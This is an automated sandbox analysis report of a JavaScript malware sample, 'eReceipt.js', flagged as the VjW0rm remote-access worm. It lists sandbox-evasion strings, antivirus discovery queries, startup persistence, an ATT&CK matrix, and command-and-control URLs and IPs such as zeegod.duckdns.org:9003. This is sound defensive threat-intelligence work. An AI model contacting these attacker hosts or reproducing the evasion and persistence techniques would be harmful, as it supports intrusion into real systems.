      Source: wscript.exe, 00000010.00000002.883452838.00000244AF4E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
      Source: wscript.exe, 0000000A.00000002.881999035.00000239FAD10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\40
      Source: wscript.exe, 00000005.00000002.884426925.000001B3A1141000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWT
      Source: wscript.exe, 00000000.00000002.882808280.000001C6DD8AC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.881792524.000001C6DCC84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.815466211.000001B3A0600000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.883870439.000001B3A0600000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.884426925.000001B3A1141000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.883006547.0000011D6E4DC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.882763356.0000011D6E4A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.884362520.00000244B00A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: wscript.exe, 00000005.00000003.815288447.000001B3A051F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: od_VMware_SATA_C5&280b647&0&000000#{
      Source: wscript.exe, 00000006.00000002.881172921.000001C97BE80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\fb8b}
      Source: wscript.exe, 0000000A.00000002.881999035.00000239FAD10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}x0
      Source: wscript.exe, 00000005.00000003.815466211.000001B3A0600000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.883870439.000001B3A0600000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.882763356.0000011D6E4A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

      HIPS / PFW / Operating System Protection Evasion

      barindex
      System process connects to network (likely due to code injection or exploit)
      Source: C:\Windows\System32\wscript.exeNetwork Connect: 212.193.30.129 9003Jump to behavior
      Source: C:\Windows\System32\wscript.exeDomain query: zeegod.duckdns.org
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\XZqsVjnTsr.jsJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\XZqsVjnTsr.jsJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\XZqsVjnTsr.js
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\XZqsVjnTsr.jsJump to behavior
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: wscript.exe, 00000009.00000002.880440429.0000011D6BAC4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Windows Defender\MsMpeng.exe
      Source: wscript.exe, 00000009.00000002.883006547.0000011D6E4DC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: r\MsMpeng.exe
      Source: wscript.exe, 00000000.00000002.882571223.000001C6DD870000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.879786917.000001C6DACD8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.881792524.000001C6DCC84000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct

      Stealing of Sensitive Information

      barindex
      Yara detected VjW0rm
      Source: Yara matchFile source: 00000012.00000002.881139684.0000026BB35D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.880223665.000001C979E1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000012.00000002.879936544.0000026BB17B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.881711321.00000239FAA0F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.881056542.000001C97BC3F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000C.00000002.880769506.00000171E040E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000C.00000002.880832784.00000171E0417000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000003.827815477.00000280C91ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000C.00000002.881396869.00000171E222F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.882667131.00000280CABE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.881255255.00000280C91ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.881083256.000001FE4248F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.880198899.000001C979E13000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.881826906.000001FE441D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.880995729.00000239F8BE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 5516, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 6652, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 4448, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 2312, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 5512, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 6408, type: MEMORYSTR

      Remote Access Functionality

      barindex
      Yara detected VjW0rm
      Source: Yara matchFile source: 00000012.00000002.881139684.0000026BB35D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.880223665.000001C979E1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000012.00000002.879936544.0000026BB17B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.881711321.00000239FAA0F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.881056542.000001C97BC3F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000C.00000002.880769506.00000171E040E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000C.00000002.880832784.00000171E0417000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000003.827815477.00000280C91ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000C.00000002.881396869.00000171E222F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.882667131.00000280CABE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.881255255.00000280C91ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.881083256.000001FE4248F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.880198899.000001C979E13000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.881826906.000001FE441D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.880995729.00000239F8BE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 5516, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 6652, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 4448, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 2312, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 5512, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 6408, type: MEMORYSTR

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid Accounts11
      Windows Management Instrumentation      		121
      Registry Run Keys / Startup Folder      		111
      Process Injection      		1
      Masquerading      		OS Credential Dumping1
      Query Registry      		Remote ServicesData from Local SystemExfiltration Over Other Network Medium11
      Non-Standard Port      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default Accounts43
      Scripting      		Boot or Logon Initialization Scripts121
      Registry Run Keys / Startup Folder      		111
      Process Injection      		LSASS Memory121
      Security Software Discovery      		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
      Data Encoding      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)43
      Scripting      		Security Account Manager1
      Remote System Discovery      		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
      Non-Application Layer Protocol      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
      Obfuscated Files or Information      		NTDS2
      File and Directory Discovery      		Distributed Component Object ModelInput CaptureScheduled Transfer12
      Application Layer Protocol      		SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets2
      System Information Discovery      		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 signatures2 2 Behavior Graph ID: 628800 Sample: eReceipt.js Startdate: 17/05/2022 Architecture: WINDOWS Score: 100 41 Snort IDS alert for network traffic 2->41 43 Multi AV Scanner detection for domain / URL 2->43 45 Antivirus detection for URL or domain 2->45 47 7 other signatures 2->47 6 wscript.exe 2 17 2->6         started        11 wscript.exe 13 2->11         started        13 wscript.exe 13 2->13         started        15 4 other processes 2->15 process3 dnsIp4 37 zeegod.duckdns.org 212.193.30.129, 49762, 49772, 49781 SPD-NETTR Russian Federation 6->37 39 192.168.2.1 unknown unknown 6->39 29 C:\Users\user\...\eReceipt.js:Zone.Identifier, ASCII 6->29 dropped 31 C:\Users\user\AppData\Roaming\eReceipt.js, ASCII 6->31 dropped 33 C:\Users\user\AppData\Roaming\XZqsVjnTsr.js, ASCII 6->33 dropped 35 2 other malicious files 6->35 dropped 51 System process connects to network (likely due to code injection or exploit) 6->51 53 Drops script or batch files to the startup folder 6->53 55 Creates multiple autostart registry keys 6->55 57 Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes) 6->57 17 wscript.exe 1 7 6->17         started        59 Wscript called in batch mode (surpress errors) 11->59 21 wscript.exe 11->21         started        23 wscript.exe 13->23         started        25 wscript.exe 15->25         started        file5 signatures6 process7 file8 27 C:\Users\user\AppData\...\XZqsVjnTsr.js, ASCII 17->27 dropped 49 Creates multiple autostart registry keys 17->49 signatures9

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      eReceipt.js20%ReversingLabsScript-JS.Trojan.Cryxos

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      SourceDetectionScannerLabelLink
      zeegod.duckdns.org10%VirustotalBrowse

      URLs

      SourceDetectionScannerLabelLink
      http://travcharles.duia.ro:5098Vredesk0%Avira URL Cloudsafe
      http://zeegod.duckdns.org:9003/VreMcroWinows0%Avira URL Cloudsafe
      http://zeegod.duckdns.org:9003/Vre5(0%Avira URL Cloudsafe
      http://travcharles.duia.ro:5098VreS~10%Avira URL Cloudsafe
      http://zeegod.duckdns.org:9003/VreW&&10%Avira URL Cloudsafe
      http://travcharles.duia.ro:5098Vre%0%Avira URL Cloudsafe
      http://travcharles.duia.ro:5098VreMcroWinows0%Avira URL Cloudsafe
      http://zeegod.duckdns.org:9003/VreICAgICAgICAgICAgIC0%Avira URL Cloudsafe
      http://travcharles.duia.ro:5098Vre0%Avira URL Cloudsafe
      http://travcharles.duia.ro:5098Vreosoft0%Avira URL Cloudsafe
      http://zeegod.duckdns.org/0%Avira URL Cloudsafe
      http://travcharles.duia.ro:5098VreMcroWinowsu0%Avira URL Cloudsafe
      http://zeegod.duckdns.org:9003/Vre?Lw0%Avira URL Cloudsafe
      http://zeegod.duckdns.org:9003/Vre#0%Avira URL Cloudsafe
      http://zeegod.duckdns.org:9003/Vre00%Avira URL Cloudsafe
      http://travcharles.duia.ro:5098VreMH0%Avira URL Cloudsafe
      http://zeegod.duckdns.org:9003/VreMcroWinowsC0%Avira URL Cloudsafe
      http://travcharles.duia.ro:5098VreMcroWinowsiniF0%Avira URL Cloudsafe
      http://travcharles.duia.ro:5098VreMcroWinowsiniG0%Avira URL Cloudsafe
      http://travcharles.duia.ro:5098Vre7E9B0-70EF-11D1-B75A-00A0C90564FE0%Avira URL Cloudsafe
      http://zeegod.duckdns.org:9003/Vre50%Avira URL Cloudsafe
      http://travcharles.duia.ro:5098Vrei0%Avira URL Cloudsafe
      http://zeegod.duckdns.org:9003/Vre20%Avira URL Cloudsafe
      http://travcharles.duia.ro:5098Vre783C6-CB41-11D1-8B02-00600806D9B60%Avira URL Cloudsafe
      http://travcharles.duia.ro:5098100%Avira URL Cloudmalware
      http://zeegod.duckdns.org:9003/VreMcroWinows10%Avira URL Cloudsafe
      http://zeegod.duckdns.org:9003/Vreuc3BsaXQo0%Avira URL Cloudsafe
      http://travcharles.duia.ro:5098Vrer0%Avira URL Cloudsafe
      http://travcharles.duia.ro:5098Vrep0%Avira URL Cloudsafe
      http://travcharles.duia.ro:5098VreMicrosoft0%Avira URL Cloudsafe
      http://travcharles.duia.ro:5098VreZ0%Avira URL Cloudsafe
      http://travcharles.duia.ro:5098VreY0%Avira URL Cloudsafe
      http://zeegod.duckdns.org:9003/VreB0%Avira URL Cloudsafe
      http://zeegod.duckdns.org:9003/Ag0%Avira URL Cloudsafe
      http://zeegod.duckdns.org:9003/Vre0%Avira URL Cloudsafe
      http://travcharles.duia.ro:5098Vree0%Avira URL Cloudsafe
      http://zeegod.duckdns.org:9003/VreM0%Avira URL Cloudsafe
      http://travcharles.duia.ro:5098Vrea0%Avira URL Cloudsafe
      http://zeegod.duckdns.org:9003/VreJ0%Avira URL Cloudsafe
      http://travcharles.duia.ro:5098VreM0%Avira URL Cloudsafe
      http://zeegod.duckdns.org:9003/VreT0%Avira URL Cloudsafe
      http://travcharles.duia.ro:5098VreWOW640%Avira URL Cloudsafe
      http://travcharles.duia.ro:5098Vref:0%Avira URL Cloudsafe
      http://zeegod.duckdns.org:9003/0%Avira URL Cloudsafe
      http://travcharles.duia.ro:5098VreM80%Avira URL Cloudsafe
      http://travcharles.duia.ro:5098Vreosoft.xmldom0%Avira URL Cloudsafe
      http://zeegod.duckdns.org:9003/Vre798AD7C45B15A0%Avira URL Cloudsafe
      http://zeegod.duckdns.org/telPROCESSOR_LEVEL=6PROCESSOR_RC0%Avira URL Cloudsafe
      http://zeegod.duckdns.org:9003/Vre0&0%Avira URL Cloudsafe
      http://zeegod.duckdns.org:9003/Vreo0%Avira URL Cloudsafe
      http://zeegod.duckdns.org:9003/VrebiBuZXcgQWN0aXZlWE0%Avira URL Cloudsafe
      http://zeegod.duckdns.org:9003/Vre7DQpmb3Ig0%Avira URL Cloudsafe
      http://zeegod.duckdns.org:9003/Vreba&0%Avira URL Cloudsafe
      http://zeegod.duckdns.org:9003/VreenP0%Avira URL Cloudsafe
      http://zeegod.duckdns.org:9003/Vre5BP0%Avira URL Cloudsafe
      http://travcharles.duia.ro:5098Vre563209-4053062332-1000%Avira URL Cloudsafe
      http://zeegod.duckdns.org:9003/Vres0%Avira URL Cloudsafe
      http://travcharles.duia.ro:5098Vre00%Avira URL Cloudsafe
      http://zeegod.duckdns.org:9003/Vre-z0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      zeegod.duckdns.org
      		212.193.30.129
      		truetrueunknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://zeegod.duckdns.org:9003/Vretrue
      • Avira URL Cloud: safe
      		unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://travcharles.duia.ro:5098Vredeskwscript.exe, 0000000C.00000002.881519996.00000171E2B20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000012.00000002.880111499.0000026BB17E2000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: safe
      		low
      http://zeegod.duckdns.org:9003/VreMcroWinowswscript.exe, 00000000.00000002.881792524.000001C6DCC84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.815093819.000001B3A057A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.883135127.000001B3A057D000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: safe
      		unknown
      http://zeegod.duckdns.org:9003/Vre5(wscript.exe, 00000000.00000002.882808280.000001C6DD8AC000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: safe
      		unknown
      http://travcharles.duia.ro:5098VreS~1wscript.exe, 00000001.00000002.882158430.000001FE44A30000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.882890634.00000280CB850000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.881999035.00000239FAD10000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: safe
      		low
      http://zeegod.duckdns.org:9003/VreW&&1wscript.exe, 00000005.00000003.815093819.000001B3A057A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.883135127.000001B3A057D000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: safe
      		unknown
      http://travcharles.duia.ro:5098Vre%wscript.exe, 0000000C.00000002.881519996.00000171E2B20000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: safe
      		low
      http://travcharles.duia.ro:5098VreMcroWinowswscript.exe, 00000006.00000002.880223665.000001C979E1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.827815477.00000280C91ED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.881255255.00000280C91ED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.880832784.00000171E0417000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: safe
      		low
      http://zeegod.duckdns.org:9003/VreICAgICAgICAgICAgICwscript.exe, 00000005.00000002.884283434.000001B3A0DF0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.882515571.0000011D6E1A0000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: safe
      		unknown
      http://travcharles.duia.ro:5098Vrewscript.exe, 00000012.00000002.880111499.0000026BB17E2000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: safe
      		low
      http://travcharles.duia.ro:5098Vreosoftwscript.exe, 00000001.00000002.882158430.000001FE44A30000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.881172921.000001C97BE80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.882890634.00000280CB850000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.881999035.00000239FAD10000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.881519996.00000171E2B20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000012.00000002.881266863.0000026BB3900000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: safe
      		low
      http://zeegod.duckdns.org/wscript.exe, 00000000.00000002.882808280.000001C6DD8AC000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: safe
      		unknown
      http://travcharles.duia.ro:5098VreMcroWinowsuwscript.exe, 00000001.00000002.881083256.000001FE4248F000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: safe
      		low
      http://zeegod.duckdns.org:9003/Vre?Lwwscript.exe, 00000009.00000002.881854049.0000011D6D8E9000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: safe
      		unknown
      http://zeegod.duckdns.org:9003/Vre#wscript.exe, 00000005.00000003.815093819.000001B3A057A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.883135127.000001B3A057D000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: safe
      		unknown
      http://zeegod.duckdns.org:9003/Vre0wscript.exe, 00000000.00000002.882808280.000001C6DD8AC000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: safe
      		unknown
      http://travcharles.duia.ro:5098VreMHwscript.exe, 00000007.00000002.882890634.00000280CB850000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: safe
      		low
      http://zeegod.duckdns.org:9003/VreMcroWinowsCwscript.exe, 00000009.00000002.881803714.0000011D6D8B2000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: safe
      		unknown
      http://travcharles.duia.ro:5098VreMcroWinowsiniFwscript.exe, 0000000A.00000002.880775140.00000239F8B9C000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: safe
      		low
      http://travcharles.duia.ro:5098VreMcroWinowsiniGwscript.exe, 00000012.00000002.879936544.0000026BB17B2000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: safe
      		low
      http://travcharles.duia.ro:5098Vre7E9B0-70EF-11D1-B75A-00A0C90564FEwscript.exe, 00000007.00000002.881546053.00000280C921B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.827671805.00000280C9218000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: safe
      		low
      http://zeegod.duckdns.org:9003/Vre5wscript.exe, 00000010.00000002.884362520.00000244B00A8000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: safe
      		unknown
